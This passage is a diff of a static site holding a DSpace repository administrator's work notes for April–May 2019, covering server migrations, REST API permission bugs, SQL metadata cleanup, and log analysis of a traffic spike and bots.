  • I also tried to download a file over HTTPS from CGSpace to DSpace Test, but it was capped at 20KiB/sec +
      +
    • I updated the Linode issue with this information
    • +
    +
  • +
  • I’m going to try to switch the kernel to the latest upstream (5.0.8) instead of Linode’s latest x86_64 +
      +
    • Nope, still 20KiB/sec
    • +
    +
  • +
+

2019-04-21

+
    +
  • Deploy Solr 4.10.4 on CGSpace (linode18)
  • +
  • Deploy Tomcat 7.0.94 on CGSpace
  • +
  • Deploy dspace-statistics-api v1.0.0 on CGSpace
  • +
  • Linode support replicated the results I had from the network speed testing and said they don’t know why it’s so slow +
      +
    • They offered to live migrate the instance to another host to see if that helps
    • +
    +
  • +
+

2019-04-22

+
    +
  • Abenet pointed out an item that doesn’t have an Altmetric score on CGSpace, but has a score of 343 in the CGSpace Altmetric dashboard +
      +
    • I tweeted the Handle to see if it will pick it up…
    • +
    • Like clockwork, after fifteen minutes there was a donut showing on CGSpace
    • +
    +
  • +
  • I want to get rid of this annoying warning that is constantly in our DSpace logs:
  • +
+
2019-04-08 19:02:31,770 WARN  org.dspace.xoai.services.impl.xoai.DSpaceRepositoryConfiguration @ { OAI 2.0 :: DSpace } Not able to retrieve the dspace.oai.url property from oai.cfg. Falling back to request address
+
    +
  • Apparently it happens once per request, which can be at least 1,500 times per day according to the DSpace logs on CGSpace (linode18):
  • +
+
$ grep -c 'Falling back to request address' dspace.log.2019-04-20
+dspace.log.2019-04-20:1515
+
    +
  • I will fix it in dspace/config/modules/oai.cfg (a sketch of the property is at the end of this day’s notes)
  • +
  • Linode says that it is likely that the host CGSpace (linode18) is on is showing signs of hardware failure and they recommended that I migrate the VM to a new host +
      +
    • I told them to migrate it at 04:00:00AM Frankfurt time, when nobody in East Africa, Europe, or South America should be using the server
    • +
    +
  • +
+
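  • Regarding the oai.cfg fix above, it should just be a matter of setting the property explicitly, something like this (the value needs to match our public OAI URL):

dspace.oai.url = https://cgspace.cgiar.org/oai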

2019-04-23

+ + +
    +
  • Perhaps that’s why the Azure pricing is so expensive!
  • +
  • Add a privacy page to CGSpace +
      +
    • The work was mostly similar to the About page at /page/about, but in addition to adding i18n strings etc, I had to add the logic for the trail to dspace-xmlui-mirage2/src/main/webapp/xsl/preprocess/general.xsl
    • +
    +
  • +
+

2019-04-24

+
    +
  • Linode migrated CGSpace (linode18) to a new host, but I am still getting poor performance when copying data to DSpace Test (linode19) +
      +
    • I asked them if we can migrate DSpace Test to a new host
    • +
    • They migrated DSpace Test to a new host and the rsync speed from Frankfurt was still capped at 20KiB/sec…
    • +
    • I booted DSpace Test to a rescue CD and tried the rsync from CGSpace there too, but it was still capped at 20KiB/sec…
    • +
    • I copied the 18GB statistics-2018 Solr core from Frankfurt to a Linode in London at 15MiB/sec, then from the London one to DSpace Test in Fremont at 15MiB/sec… so WTF is up with Frankfurt→Fremont?!
    • +
    +
  • +
  • Finally upload the 218 IITA items from March to CGSpace +
      +
    • Abenet and I had to do a little bit more work to correct the metadata of one item that appeared to be a duplicate, but really just had the wrong DOI
    • +
    +
  • +
  • While I was uploading the IITA records I noticed that twenty of the records Sisay uploaded in 2018-09 had double Handles (dc.identifier.uri) +
      +
    • According to my notes in 2018-09 I had noticed this when he uploaded the records and told him to remove them, but he didn’t…
    • +
    • I exported the IITA community as a CSV then used csvcut to extract the two URI columns and identify and fix the records:
    • +
    +
  • +
+
$ csvcut -c id,dc.identifier.uri,'dc.identifier.uri[]' ~/Downloads/2019-04-24-IITA.csv > /tmp/iita.csv
+
    +
  • Carlos Tejo from the Land Portal had been emailing me this week to ask about the old REST API that Tsega was building in 2017 +
      +
    • I told him we never finished it, and that he should try to use the /items/find-by-metadata-field endpoint, with the caveat that you need to match the language attribute exactly (ie “en”, “en_US”, null, etc)
    • +
    • I asked him how many terms they are interested in, as we could probably make it easier by normalizing the language attributes of these fields (it would help us anyways)
    • +
    • He says he’s getting HTTP 401 errors when trying to search for CPWF subject terms, which I can reproduce:
    • +
    +
  • +
+
$ curl -f -H "accept: application/json" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
+curl: (22) The requested URL returned error: 401
+
    +
  • Note that curl only shows the HTTP 401 error if you use -f (fail), and only then if you don’t include -s +
      +
    • I see there are about 1,000 items using CPWF subject “WATER MANAGEMENT” in the database, so there should definitely be results
    • +
    • The breakdown of text_lang values used in those 942 items is:
    • +
    +
  • +
+
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='en_US';
+ count 
+-------
+   376
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang='';
+ count 
+-------
+   149
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT' AND text_lang IS NULL;
+ count 
+-------
+   417
+(1 row)
+
    +
  • I see that the HTTP 401 issue seems to be a bug due to an item that the user doesn’t have permission to access… from the DSpace log:
  • +
+
2019-04-24 08:11:51,129 INFO  org.dspace.rest.ItemsResource @ Looking for item with metadata(key=cg.subject.cpwf,value=WATER MANAGEMENT, language=en_US).
+2019-04-24 08:11:51,231 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72448
+2019-04-24 08:11:51,238 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/72491
+2019-04-24 08:11:51,243 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous::view_item:handle=10568/75703
+2019-04-24 08:11:51,252 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item!
+
    +
  • Nevertheless, if I request using the null language I get 1020 results, plus 179 for a blank language attribute:
  • +
+
$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": null}' | jq length
+1020
+$ curl -s -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": ""}' | jq length
+179
+
    +
  • This is weird because I see 942–1156 items with “WATER MANAGEMENT” (depending on wildcard matching for errors in subject spelling):
  • +
+
dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value='WATER MANAGEMENT';
+ count 
+-------
+   942
+(1 row)
+
+dspace=# SELECT COUNT(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=208 AND text_value LIKE '%WATER MANAGEMENT%';
+ count 
+-------
+  1156
+(1 row)
+
    +
  • I sent a message to the dspace-tech mailing list to ask for help
  • +
+

2019-04-25

+
    +
  • Peter pointed out that we need to remove Delicious and Google+ from our social sharing links +
      +
    • Also, it would be nice if we could include the item title in the shared link
    • +
    • I created an issue on GitHub to track this (#419)
    • +
    +
  • +
  • I tested the REST API after logging in with my super admin account and I was able to get results for the problematic query:
  • +
+
$ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/login" -d '{"email":"example@me.com","password":"fuuuuu"}'
+$ curl -f -H "Content-Type: application/json" -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -X GET "https://dspacetest.cgiar.org/rest/status"
+$ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
+
    +
  • I created a normal user for Carlos to try as an unprivileged user:
  • +
+
$ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
+
    +
  • But I still get the HTTP 401 and I have no idea which item is causing it
  • +
  • I enabled more verbose logging in ItemsResource.java and now I can at least see the item ID that causes the failure… +
      +
    • The item is not even in the archive, but somehow it is discoverable
    • +
    +
  • +
+
dspace=# SELECT * FROM item WHERE item_id=74648;
+ item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection | discoverable
+---------+--------------+------------+-----------+----------------------------+-------------------+--------------
+   74648 |          113 | f          | f         | 2016-03-30 09:00:52.131+00 |                   | t
+(1 row)
+
    +
  • I tried to delete the item in the web interface, and it seems successful, but I can still access the item in the admin interface, and nothing changes in PostgreSQL
  • +
  • Meet with CodeObia to see progress on AReS version 2
  • +
  • Marissa Van Epp asked me to add a few new metadata values to their Phase II Project Tags field (cg.identifier.ccafsprojectpii) +
      +
    • I created a pull request for it and will do it the next time I run updates on CGSpace
    • +
    +
  • +
  • Communicate with Carlos Tejo from the Land Portal about the /items/find-by-metadata-field endpoint
  • +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
+

2019-04-26

+
    +
  • Export a list of authors for Peter to look through:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
+COPY 65752
+

2019-04-28

+
    +
  • Still trying to figure out the issue with the items that cause the REST API’s /items/find-by-metadata-field endpoint to throw an exception +
      +
    • I made the item private in the UI and then I see in the UI and PostgreSQL that it is no longer discoverable:
    • +
    +
  • +
+
dspace=# SELECT * FROM item WHERE item_id=74648;
+ item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection | discoverable 
+---------+--------------+------------+-----------+----------------------------+-------------------+--------------
+   74648 |          113 | f          | f         | 2019-04-28 08:48:52.114-07 |                   | f
+(1 row)
+
    +
  • And I tried the curl command from above again, but I still get the HTTP 401 and the same error in the DSpace log:
  • +
+
2019-04-28 08:53:07,170 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=74648)!
+
    +
  • I even tried to “expunge” the item using an action in CSV, and it said “EXPUNGED!” but the item is still there…
  • +
+
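  • For reference, the kind of CSV I mean for that is just the item ID plus an action column (a sketch, assuming the batch metadata editing “action” column is enabled in bulkedit.cfg):

id,action
74648,expunge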

2019-04-30

+
    +
  • Send mail to the dspace-tech mailing list to ask about the item expunge issue
  • +
  • Delete and re-create Podman container for dspacedb after pulling a new PostgreSQL container:
  • +
+
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+
    +
  • Carlos from LandPortal asked if I could export CGSpace in a machine-readable format so I think I’ll try to do a CSV +
      +
    • In order to make it easier for him to understand the CSV I will normalize the text languages (minus the provenance field) on my local development instance before exporting:
    • +
    +
  • +
+
dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id != 28 GROUP BY text_lang;
+ text_lang |  count
+-----------+---------
+           |  358647
+ *         |      11
+ E.        |       1
+ en        |    1635
+ en_US     |  602312
+ es        |      12
+ es_ES     |       2
+ ethnob    |       1
+ fr        |       2
+ spa       |       2
+           | 1074345
+(11 rows)
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
+UPDATE 360295
+dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE 1074345
+dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
+UPDATE 14
+
    +
  • Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos
  • +
  • In other news, while I was looking through the CSV in OpenRefine I saw lots of weird values in some fields… we should check, for example: +
      +
    • issue dates
    • +
    • items missing handles
    • +
    • authorship types
    • +
    +
  • +
+ + + + + + +
+ + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/2019-05/index.html b/docs/2019-05/index.html new file mode 100644 index 000000000..64e65931c --- /dev/null +++ b/docs/2019-05/index.html @@ -0,0 +1,685 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + May, 2019 | CGSpace Notes + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + +
+
+

May, 2019

+ +
+

2019-05-01

+
    +
  • Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
  • +
  • A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +
      +
    • Apparently if the item is in the workflowitem table it is submitted to a workflow
    • +
    • And if it is in the workspaceitem table it is in the pre-submitted state
    • +
    +
  • +
  • The item seems to be in a pre-submitted state, so I tried to delete it from there:
  • +
+
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
    +
  • But after this I tried to delete the item from the XMLUI and it is still present…
  • +
+
    +
  • I managed to delete the problematic item from the database +
      +
    • First I deleted the item’s bitstream in XMLUI and then ran dspace cleanup -v to remove it from the assetstore
    • +
    • Then I ran the following SQL:
    • +
    +
  • +
+
dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
+dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+dspace=# DELETE FROM item WHERE item_id=74648;
+
    +
  • Now the item is (hopefully) really gone and I can continue to troubleshoot the issue with the REST API’s /items/find-by-metadata-field endpoint +
      +
    • Of course I run into another HTTP 401 error when I continue trying the LandPortal search from last month:
    • +
    +
  • +
+
$ curl -f -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
+curl: (22) The requested URL returned error: 401 Unauthorized
+
    +
  • The DSpace log shows the item ID (because I modified the error text):
  • +
+
2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
+
    +
  • If I delete that one I get another, making the list of item IDs so far: +
      +
    • 74648
    • +
    • 77708
    • +
    • 85079
    • +
    +
  • +
  • Some are in the workspaceitem table (pre-submission), others are in the workflowitem table (submitted), and others are actually approved, but withdrawn… +
      +
    • This is actually a worthless exercise because the real issue is that the /items/find-by-metadata-field endpoint is simply flawed by design and shouldn’t fatally error when the search returns items the user doesn’t have permission to access
    • +
    • It would take way too much time to try to fix the fucked up items that are in limbo by deleting them in SQL, but also, it doesn’t actually fix the problem because some items are submitted but withdrawn, so they actually have handles and everything
    • +
    • I think the solution is to recommend that people don’t use the /items/find-by-metadata-field endpoint
    • +
    +
  • +
  • CIP is asking about embedding PDF thumbnail images in their RSS feeds again +
      +
    • They asked in 2018-09 as well and I told them it wasn’t possible
    • +
    • To make sure, I looked at the documentation for RSS media feeds and tried it, but couldn’t get it to work
    • +
    • It seems to be geared towards iTunes and Podcasts… I dunno
    • +
    +
  • +
  • CIP also asked for a way to get an XML file of all their RTB journal articles on CGSpace +
      +
    • I told them to use the REST API like (where 1179 is the id of the RTB journal articles collection):
    • +
    +
  • +
+
https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&expand=metadata
+

2019-05-03

+
    +
  • A user from CIAT emailed to say that CGSpace submission emails have not been working the last few weeks +
      +
    • I checked the dspace test-email script on CGSpace and they are indeed failing:
    • +
    +
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: woohoo@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+
    +
  • I will ask ILRI ICT to reset the password +
      +
    • They reset the password and I tested it on CGSpace
    • +
    +
  • +
+
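  • For reference, the relevant SMTP settings live in dspace.cfg; roughly like this, with placeholder account values:

mail.server = smtp.office365.com
mail.server.port = 587
mail.server.username = cgspace-support@cgiar.org
mail.server.password = thenewpassword
mail.from.address = cgspace-support@cgiar.org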

2019-05-05

+
    +
  • Run all system updates on DSpace Test (linode19) and reboot it
  • +
  • Merge changes into the 5_x-prod branch of CGSpace: +
      +
    • Updates to remove deprecated social media websites (Google+ and Delicious), update Twitter share intent, and add item title to Twitter and email links (#421)
    • +
    • Add new CCAFS Phase II project tags (#420)
    • +
    • Add item ID to REST API error logging (#422)
    • +
    +
  • +
  • Re-deploy CGSpace from 5_x-prod branch
  • +
  • Run all system updates on CGSpace (linode18) and reboot it
  • +
  • Tag version 1.1.0 of the dspace-statistics-api (with Falcon 2.0.0) +
      +
    • Deploy on DSpace Test
    • +
    +
  • +
+

2019-05-06

+
    +
  • Peter pointed out that Solr stats are only showing 2019 stats +
      +
    • I looked at the Solr Admin UI and I see:
    • +
    +
  • +
+
statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+
    +
  • As well as this error in the logs:
  • +
+
Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+
    +
  • Strangely enough, I do see the statistics-2018, statistics-2017, etc cores in the Admin UI…
  • +
  • I restarted Tomcat a few times (and even deleted all the Solr write locks) and at least five times there were issues loading one statistics core, causing the Atmire stats to be incomplete +
      +
    • Also, I tried to increase the writeLockTimeout in solrconfig.xml from the default of 1000ms to 10000ms
    • +
    • Eventually the Atmire stats started working, despite errors about “Error opening new searcher” in the Solr Admin UI
    • +
    • I wrote to the dspace-tech mailing list again on the thread from March, 2019
    • +
    +
  • +
  • There were a few alerts from UptimeRobot about CGSpace going up and down this morning, along with an alert from Linode about 596% load +
      +
    • Looking at the Munin stats I see an exponential rise in DSpace XMLUI sessions, firewall activity, and PostgreSQL connections this morning:
    • +
    +
  • +
+

CGSpace XMLUI sessions day

+

linode18 firewall connections day

+

linode18 postgres connections day

+

linode18 CPU day

+
    +
  • The number of unique sessions today is ridiculously high compared to the last few days considering it’s only 12:30PM right now:
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
+101108
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
+14618
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
+14946
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
+6410
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
+7758
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
+20528
+
    +
  • The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+7127
+# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+1231
+# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+1255
+# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+1736
+# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+1573
+# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
+1410
+
    +
  • Just this morning between the hours of 2 and 6 the number of unique sessions was very high compared to previous mornings:
  • +
+
$ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+83650
+$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2547
+$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2574
+$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2911
+$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2704
+$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+3699
+
    +
  • Most of the requests were GETs:
  • +
+
# cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E "(GET|HEAD|POST|PUT)" | sort | uniq -c | sort -n
+      1 PUT
+     98 POST
+   2845 HEAD
+  98121 GET
+
    +
  • I’m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?
  • +
  • Looking again, I see 84,000 requests to /handle this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in access.log):
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E " /handle/[0-9]+/[0-9]+"
+84350
+
    +
  • But it would be difficult to find a pattern for those requests because they cover 78,000 unique Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+ HTTP" | sort | uniq | wc -l
+78104
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+/(discover|browse)" | wc -l
+2492
+
    +
  • In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:
  • +
+
# grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
+      3 2a01:7e00::f03c:91ff:fe0a:d645
+    113 63.32.242.35
+
    +
  • According to viewdns.info that server belongs to Macaroni Brothers +
      +
    • The user agent of their non-REST API requests from the same IP is Drupal
    • +
    • This is one very good reason to limit REST API requests, and perhaps to enable caching via nginx
    • +
    +
  • +
+
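  • A rough sketch of what nginx rate limiting for the REST API could look like (nothing deployed yet; the zone name, rates, and upstream are assumptions):

# in the http {} context
limit_req_zone $binary_remote_addr zone=rest_limit:10m rate=5r/s;

# in the server {} context
location /rest/ {
    limit_req zone=rest_limit burst=10 nodelay;
    proxy_pass http://tomcat_http;
}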

2019-05-07

+
    +
  • The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:
  • +
+
# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
+13969
+# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
+5936
+# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
+6229
+# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
+8051
+
    +
  • Total number of sessions yesterday was much higher compared to days last week:
  • +
+
$ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+144160
+$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+57269
+$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+58648
+$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+27883
+$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+26996
+$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+61866
+
    +
  • The usage statistics seem to agree that yesterday was crazy:
  • +
+

Atmire Usage statistics spike 2019-05-06

+
    +
  • Sarah from RTB asked me about the RSS / XML link for the CGIAR.org website again +
      +
    • Apparently Sam Stacey is trying to add an RSS feed so the items get automatically syndicated to the CGIAR website
    • +
    • I sent her the link to the collection RSS feed
    • +
    +
  • +
  • Add requests cache to resolve-addresses.py script
  • +
+
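  • A minimal sketch of what that looks like with the requests-cache library, assuming the script keeps using ipapi.co for lookups:

import requests
import requests_cache

# Cache responses locally so repeated lookups don't burn through the
# ipapi.co daily request limit
requests_cache.install_cache('resolve-addresses')

r = requests.get('https://ipapi.co/8.8.8.8/json/')
print(r.json().get('org'))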

2019-05-08

+
    +
  • A user said that CGSpace emails have stopped sending again +
      +
    • Indeed, the dspace test-email script is showing an authentication failure:
    • +
    +
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: wooooo@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+
    +
  • I checked the settings and apparently I had updated it incorrectly last week after ICT reset the password
  • +
  • Help Moayad with certbot-auto for Let’s Encrypt scripts on the new AReS server (linode20)
  • +
  • Normalize all text_lang values for metadata on CGSpace and DSpace Test (as I had tested last month):
  • +
+
UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
+UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
+
    +
  • Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018 +
      +
    • They will be doing a migration of 1500 items from their TYPO3 database into CGSpace soon and want an example CSV with all required metadata columns
    • +
    +
  • +
+

2019-05-10

+
    +
  • I finally had time to analyze the 7,000 IPs from the major traffic spike on 2019-05-06 after several runs of my resolve-addresses.py script (ipapi.co has a limit of 1,000 requests per day)
  • +
  • Resolving the unique IP addresses to organization and AS names reveals some pretty big abusers: +
      +
    • 1213 from Region40 LLC (AS200557)
    • +
    • 697 from Trusov Ilya Igorevych (AS50896)
    • +
    • 687 from UGB Hosting OU (AS206485)
    • +
    • 620 from UAB Rakrejus (AS62282)
    • +
    • 491 from Dedipath (AS35913)
    • +
    • 476 from Global Layer B.V. (AS49453)
    • +
    • 333 from QuadraNet Enterprises LLC (AS8100)
    • +
    • 278 from GigeNET (AS32181)
    • +
    • 261 from Psychz Networks (AS40676)
    • +
    • 196 from Cogent Communications (AS174)
    • +
    • 125 from Blockchain Network Solutions Ltd (AS43444)
    • +
    • 118 from Silverstar Invest Limited (AS35624)
    • +
    +
  • +
  • All of the IPs from these networks are using generic user agents like this one, but there are MANY more, and they change frequently:
  • +
+
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36"
+
+ +
    +
  • So this was definitely an attack of some sort… only God knows why
  • +
  • I noticed a few new bots that don’t use the word “bot” in their user agent and therefore don’t match Tomcat’s Crawler Session Manager Valve: +
      +
    • Blackboard Safeassign
    • +
    • Unpaywall
    • +
    +
  • +
+

2019-05-12

+
    +
  • I see that the Unpaywall bot is responsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):
  • +
+
$ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l   
+2206
+
    +
